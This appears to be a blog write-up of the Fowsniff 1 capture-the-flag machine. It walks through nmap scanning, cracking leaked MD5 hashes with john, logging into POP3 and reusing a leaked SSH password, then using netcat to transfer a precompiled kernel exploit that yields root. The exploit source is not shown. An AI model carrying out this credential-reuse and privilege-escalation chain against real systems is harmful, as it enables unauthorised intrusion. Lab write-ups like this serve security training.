Fowsniff 1 – Writeup


This machine is,262/

Recon Phase

As usual I had to find it on the network

root@kali:~# nmap -sn
Nmap scan report for
Host is up (0.00017s latency).
MAC Address: 0A:00:27:00:00:11 (Unknown)
Nmap scan report for
Host is up (0.00026s latency).
MAC Address: 08:00:27:7E:72:FB (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up (0.00045s latency).
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.99 seconds

Then take a look for any services

root@kali:~# nmap -sV
Nmap scan report for
Host is up (0.00022s latency).
Not shown: 996 closed ports
22/tcp  open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
110/tcp open  pop3    Dovecot pop3d
143/tcp open  imap    Dovecot imapd
MAC Address: 08:00:27:66:85:17 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 7.73 seconds

With an idea of the services, I checked out the web server at

Screenshot 1

Screenshot 2

The mention of a twitter account was useful, so I went to take a look at

Screenshot 3

Screenshot 4

Important info, stone is the sysadmin, also there is a pastebin dump at

Screenshot 5

Which has a load of md5s, I put in a file called hashes.txt


With the file setup, I used john to crack them

root@kali:~# john hashes.txt --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with no different salts (Raw-MD5 [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
scoobydoo2       (seina@fowsniff)
orlando12        (parede@fowsniff)
apples01         (tegel@fowsniff)
skyler22         (baksteen@fowsniff)
mailcall         (mauer@fowsniff)
07011972         (sciana@fowsniff)
carp4ever        (mursten@fowsniff)
bilbo101         (mustikka@fowsniff)
8g 0:00:00:04 DONE (2018-12-18 18:33) 1.766g/s 3166Kp/s 3166Kc/s 8097KC/s      123d..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed

All but the sysadmins got crack, so I tried them out on ssh, but none worked, so I tried the pop3 server (I could have used hydra or some other tool here, but I ended up doing it manually)

root@kali:~# nc 110
+OK Welcome to the Fowsniff Corporate Mail Server!
USER seina
PASS scoobydoo2
+OK Logged in.

The first one worked, so I looked for messages

+OK 2 messages:
1 1622
2 1280
+OK 1622 octets
Return-Path: <stone@fowsniff>
X-Original-To: seina@fowsniff
Delivered-To: seina@fowsniff
Received: by fowsniff (Postfix, from userid 1000)
    id 0FA3916A; Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
To: baksteen@fowsniff, mauer@fowsniff, mursten@fowsniff,
    mustikka@fowsniff, parede@fowsniff, sciana@fowsniff, seina@fowsniff,
Subject: URGENT! Security EVENT!
Message-Id: <20180313185107.0FA3916A@fowsniff>
Date: Tue, 13 Mar 2018 14:51:07 -0400 (EDT)
From: stone@fowsniff (stone)
Dear All,
A few days ago, a malicious actor was able to gain entry to
our internal email systems. The attacker was able to exploit
incorrectly filtered escape characters within our SQL database
to access our login credentials. Both the SQL and authentication
system used legacy methods that had not been updated in some time.
We have been instructed to perform a complete internal system
overhaul. While the main systems are "in the shop," we have
moved to this isolated, temporary server that has minimal
This server is capable of sending and receiving emails, but only
locally. That means you can only send emails to other users, not
to the world wide web. You can, however, access this system via
the SSH protocol.
The temporary password for SSH is "S1ck3nBluff+secureshell"
You MUST change this password as soon as possible, and you will do so under my
guidance. I saw the leak the attacker posted online, and I must say that your
passwords were not very secure.
Come see me in my office at your earliest convenience and we'll set it up.
A.J Stone

This was good, from the "To" field I could see this was sent to every user, and a temporary password was assigned, which seemed to be the same for all of them, so I could try it against each of their accounts to see if any of them haven't changed it yet. The password was "S1ck3nBluff+secureshell" (Again, could have used hydra here, but I did it manually)

Trying each user in turn I got to

root@kali:~# ssh [email protected]
                            _____                       _  __  __
      :sdddddddddddddddy+  |  ___|____      _____ _ __ (_)/ _|/ _|
   :yNMMMMMMMMMMMMMNmhsso  | |_ / _ \ \ /\ / / __| '_ \| | |_| |_
.sdmmmmmNmmmmmmmNdyssssso  |  _| (_) \ V  V /\__ \ | | | |  _|  _|
-:      y.      dssssssso  |_|  \___/ \_/\_/ |___/_| |_|_|_| |_|
-:      y.      dssssssso                ____
-:      y.      dssssssso               / ___|___  _ __ _ __
-:      y.      dssssssso              | |   / _ \| '__| '_ \
-:      o.      dssssssso              | |__| (_) | |  | |_) |  _
-:      o.      yssssssso               \____\___/|_|  | .__/  (_)
-:    .+mdddddddmyyyyyhy:                              |_|
-: -odMMMMMMMMMMmhhdy/.
.ohdddddddddddddho:                  Delivering Solutions
   ****  Welcome to the Fowsniff Corporate Server! ****
              ---------- NOTICE: ----------
 * Due to the recent security breach, we are running on a very minimal system.
 * Contact AJ Stone -IMMEDIATELY- about changing your email and SSH passwords.
Last login: Tue Mar 13 16:55:40 2018 from

I was logged in, now to get root

Priv Esc

Now as part of my standard checks when I first get a shell, I check the kernel

baksteen@fowsniff:~$ uname -a
Linux fowsniff 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Happily this kernel version was vulnerable to an exploit, specifically The only problem was this machine didn't have gcc, as confirmed with which

baksteen@fowsniff:~$ which gcc

But I could try with the exploit compiled locally, so I downloaded it to my machine and called it exploit.c

root@kali:~# gcc exploit.c

I then used netcat to transfer it to the target

root@kali:~# nc -nlvp 4444 < a.out
baksteen@fowsniff:~$ cd /tmp
baksteen@fowsniff:/tmp$ nc 4444 > exploit

Then chmod it so I could run it

baksteen@fowsniff:/tmp$ chmod +x exploit

Finally I ran the exploit

baksteen@fowsniff:/tmp$ ./exploit
task_struct = ffff88001c2dc600
uidptr = ffff88001f3f9f04
spawning root shell

That popped a root shell, time to get the flag

root@fowsniff:/tmp# cd /root
root@fowsniff:/root# ls -la
drwx------  4 root root 4096 Mar  9  2018 .
drwxr-xr-x 22 root root 4096 Mar  9  2018 ..
-rw-r--r--  1 root root 3117 Mar  9  2018 .bashrc
-rw-r--r--  1 root root  582 Mar  9  2018 flag.txt
drwx------  5 root root 4096 Mar  9  2018 Maildir
drwxr-xr-x  2 root root 4096 Mar  9  2018 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
root@fowsniff:/root# cat flag.txt
   ___                        _        _      _   _             _
  / __|___ _ _  __ _ _ _ __ _| |_ _  _| |__ _| |_(_)___ _ _  __| |
 | (__/ _ \ ' \/ _` | '_/ _` |  _| || | / _` |  _| / _ \ ' \(_-<_|
  \___\___/_||_\__, |_| \__,_|\__|\_,_|_\__,_|\__|_\___/_||_/__(_)
  |    R O O T   |
  |    F L A G   |
Nice work!
This CTF was built with love in every byte by @berzerk0 on Twitter.
Special thanks to psf, @nbulischeck and the whole Fofao Team.

And the machine was done

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.